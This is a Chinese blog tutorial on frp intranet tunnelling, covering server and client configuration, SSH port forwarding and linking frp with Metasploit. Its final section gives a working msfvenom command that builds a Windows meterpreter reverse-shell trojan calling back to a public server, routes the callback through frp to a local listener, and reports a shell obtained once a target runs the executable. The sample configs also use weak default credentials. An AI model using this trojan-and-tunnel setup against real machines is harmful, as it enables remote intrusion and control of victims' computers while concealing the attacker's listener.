当前位置:   article > 正文

frp内网穿透教程2023最新(含内网ssh配置与msf联动配置)_frp ssh配置

frp ssh配置

1、frp简介

frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发。

1.1 为什么要使用frp

两台不同内网的机器,是没有办法直接进行访问的,通过配置frp内网穿透,可以实现将2台不同内网的机器实现互联

1.2 使用frp之前

一定要有一个公网的ip,去买个云服务器就行,企鹅云的服务器现在新用户也就65一个月

1.3 frp下载地址

https://github.com/fatedier/frp/releases

根据不同的系统需求,下载不同的frp版本就行,linux就下载如下图所示的版本
在这里插入图片描述

2、frp的配置与使用,配置的过程分为两个部分,一是服务器端(外网服务器)的配置;二是客户端(内网服务器)配置。

2.1配置服务端

将下载好后的frp文件上传到服务器,使用如下命令解压

tar -zxvf frp_0.44.0_linux_amd64.tar.gz
  • 1

在这里插入图片描述
之后使用cd命令进入解压之后的文件夹

cd frp_0.44.0_linux_amd64/
  • 1

使用vim frps.ini命令进入编辑模式,写入如下信息

[common]
# frp监听的端口,默认是7000
bind_port = 7000
# 授权码
token =aini123
# 这个token之后在客户端会用到

# frp管理后台端口
dashboard_port = 8000
# frp管理后台用户名和密码
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true

# frp日志配置
log_file = /var/log/frps.log
log_level = info
log_max_days = 3
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18

配置完成后如下图
在这里插入图片描述
启动frp服务

./frps -c ./frps.ini
  • 1

启动成功如下图
在这里插入图片描述
之后输入服务端ip:8000能出现如下页面,就说明配置完成了
在这里插入图片描述

2.2配置客户端

同上方法,在客户端上传解压文件,进入解压的文件夹

使用vim frpc.ini 编辑客户端配置文件,内容如下

# 客户端配置
[common]
server_addr = 服务器的ip
 # 与frps.ini的bind_port一致
server_port = 7000
 # 与frps.ini的token一致
token =aini123

# 配置msf服务
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 
#转发给本机的 5555   本地msf监听127.0.0.1:5555端口
remote_port = 6000 
#服务端用 6000 端口转发给本机   
#木马程序的shell返回地址应该是175.24.230.65:6000,然后服务器会将6000的值转发给本地5555端口

# 配置ssh服务
[ssh]
type = tcp
local_ip =127.0.0.1
local_port =22
remote_port =6001
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24

配置好后如下图:
在这里插入图片描述
使用./frpc -c ./frpc.ini命令启动客户端,会出现如下连接成功的显示,如果连接失败,记得注释不要和配置代码放同一行就不会报错了

3、测试ssh连接

因为前面设置的ssh连接remote_port转发端口为6001,所以我们只需要连接外网服务器的6001端口,就能连接上客户端的ssh
在这里插入图片描述
连接成功
在这里插入图片描述

4、测试msf连接

msf制作一个反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=公网ip lport=6000 --platform win -f exe -o msf.exe
  • 1

msf设置监听5555端口
在这里插入图片描述
靶机打开反弹连接的木马,成功获取shell
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/147962
推荐阅读
相关标签
  

闽ICP备14008679号